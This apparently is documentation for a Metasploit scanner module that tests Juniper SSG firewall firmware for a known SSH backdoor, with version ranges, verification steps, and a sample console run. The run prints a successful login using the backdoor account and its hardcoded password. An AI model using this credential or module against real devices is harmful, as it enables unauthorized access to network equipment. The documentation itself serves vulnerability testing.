2016-07-29 23:11:57 -04:00
## Vulnerable Application
Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.
A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): [here ](https://github.com/h00die/MSF-Testing-Scripts/tree/master/juniper_firmware )
2023-10-10 14:46:18 -04:00
For verification purposes, an example vuln python script is also available [here ](https://github.com/h00die/MSF-Testing-Scripts )
2016-07-29 23:11:57 -04:00
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ` use auxiliary/scanner/ssh/juniper_backdoor`
4. Do: `set rhosts`
5. Do: `run`
6. You should see: `[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u`
## Scenarios
Example run against a Juniper SSG5 with vuln firmware from above link.
```
msf > use auxiliary/scanner/ssh/juniper_backdoor
msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
rhosts => 192.168.1.1
msf auxiliary(juniper_backdoor) > set verbose true
verbose => true
msf auxiliary(juniper_backdoor) > run
[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
